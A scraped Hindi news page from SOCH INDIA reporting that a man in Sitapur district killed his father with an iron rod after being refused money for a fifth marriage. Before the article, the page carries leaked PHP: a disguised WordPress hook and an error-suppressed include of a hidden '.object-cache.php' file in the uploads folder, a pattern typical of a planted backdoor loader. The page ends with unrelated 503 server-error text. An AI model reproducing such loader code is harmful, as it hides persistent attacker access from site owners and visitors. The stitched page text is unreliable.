add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 5वीं शादी खातिर पैसे मांगे, नहीं देने पर कर दी पिता की हत्या – SOCH INDIA
Menu

अपराध समाचार
5वीं शादी खातिर पैसे मांगे, नहीं देने पर कर दी पिता की हत्या

nobanner

उत्तर प्रदेश के सीतापुर जिले के संदना थाना क्षेत्र में एक युवक ने पांचवीं शादी के लिए पैसे न देने पर अपने पिता की हत्या कर दी और फरार हो गया. घटना की सूचना मिलने पर पुलिस अधीक्षक मृगेंद्र सिंह पुलिस फोर्स के साथ मौके पर पहुंचे और शव को पोस्टमार्टम के लिए भेज जांच पड़ताल शुरू कर दी.

सोमवार शाम अपने छोटे बेटे अशोक से विवाद हुआ था

पुलिस के मुताबिक, संदना इलाके के देवरी खुर्द गांव निवासी इंदल का सोमवार शाम अपने छोटे बेटे अशोक से विवाद हुआ था. अशोक चार शादियां कर चुका था, लेकिन शराब की लत के चलते कोई शादी सफल नहीं हुई. अब वह पांचवीं शादी करना चाह रहा था.

पिता से पैसे मांगे, लेकिन पिता ने इनकार कर दिया

जिसके लिए उसने सोमवार की शाम पिता से पैसे मांगे, लेकिन पिता ने इनकार कर दिया. जिसको लेकर दोनों के बीच झगड़ा हुआ. मामले की सूचना पुलिस को फोन पर दी गई. जैसे ही पुलिस मौके पर पहुंची, अशोक घर से भाग निकला था. उस समय मामला शांत हो गया.

शराब के नशे में घर लौटा और पिता से फिर झगड़ने लगा

लेकिन, तीन जुलाई की देर रात अशोक शराब के नशे में घर लौटा और पिता से फिर झगड़ने लगा. विरोध करने पर उसने भाई रमेश और उसकी पत्नी रेशमी की पिटाई कर दी. फिर घर में रखी लोहे की रॉड से पिता के सीने और गले पर ताबड़तोड़ वार कर हत्या कर दी.

मृगेंद्र सिंह ने घटना के बारे में परिजनों से पूछताछ की

मौके पर पहुंचे एसपी मृगेंद्र सिंह ने घटना के बारे में परिजनों से पूछताछ की. उन्होंने थानाध्यक्ष को जल्द से जल्द आरोपी को गिरफ्तार करने का निर्देश दिया है. इस घटना के बाद लोग काफी घबराए हुए हैं. लोगों का कहना है कि उन्हें इस तरह की घटना की उम्मीद नहीं थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.